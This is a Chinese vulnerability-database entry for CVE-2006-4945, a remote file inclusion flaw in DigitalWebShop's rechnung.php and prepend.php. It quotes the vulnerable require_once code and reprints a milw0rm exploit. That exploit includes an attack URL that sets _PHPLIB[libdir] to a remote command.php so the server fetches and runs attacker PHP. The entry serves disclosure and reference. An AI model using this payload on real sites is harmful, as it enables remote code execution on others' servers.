DigitalWebShop多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111077 漏洞类型 输入验证
发布时间 2006-09-19 更新时间 2006-09-25
CVE编号 CVE-2006-4945 CNNVD-ID CNNVD-200609-392
漏洞平台 PHP CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/2398
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-392
|漏洞详情
DigitalWebShop是一个内嵌的PHP脚本,可以使用图形相册和描述设计在线产品目录。DigitalWebShop的rechnung.php和prepend.php文件没有正确地验证_PHPLIB[libdir]参数的输入,允许攻击者通过包含本地和外部资源的任意文件执行任意PHP代码。漏洞代码如下:....require_once($_PHPLIB["libdir"]."phpDB-mysql.lib");/*MysqlClass*/require_once($_PHPLIB["libdir"]."messages_inc.php");/*Layoutf?rEchos&Prints.*/....成功攻击要求打开了register_globals。
|漏洞EXP
# Title  :  Digital WebShop = v1.128 Multiple Remote File Include Vulnerabilities
# Author :   ajann
# Script Page : http://digitalwebshop.dyndns.org

# Exploit;
*******************************************************************************
[Files]
rechnung.php
prepend.php
[/Files]

[Code,1]
prepend.php Error:

// include Werzeuge
..
....
require_once($_PHPLIB["libdir"] . "phpDB-mysql.lib");                   /*
Mysql Class*/
require_once($_PHPLIB["libdir"] . "messages_inc.php");                  /*
Layout f?r Echos & Prints. */
....
..

Key [:] _PHPLIB[libdir]=http://target.com/command.php?

\Example:

http://target.com/rechnung.php?_PHPLIB[libdir]=http://target.com/command.php?

# ajann,Turkey
# ...
# Im not Hacker!

# milw0rm.com [2006-09-19]
|参考资料

来源:XF
名称:digitalwebshop-libdir-file-include(29037)
链接:http://xforce.iss.net/xforce/xfdb/29037
来源:BID
名称:20107
链接:http://www.securityfocus.com/bid/20107
来源:VUPEN
名称:ADV-2006-3705
链接:http://www.frsirt.com/english/advisories/2006/3705
来源:SECUNIA
名称:22026
链接:http://secunia.com/advisories/22026
来源:MILW0RM
名称:2398
链接:http://milw0rm.com/exploits/2398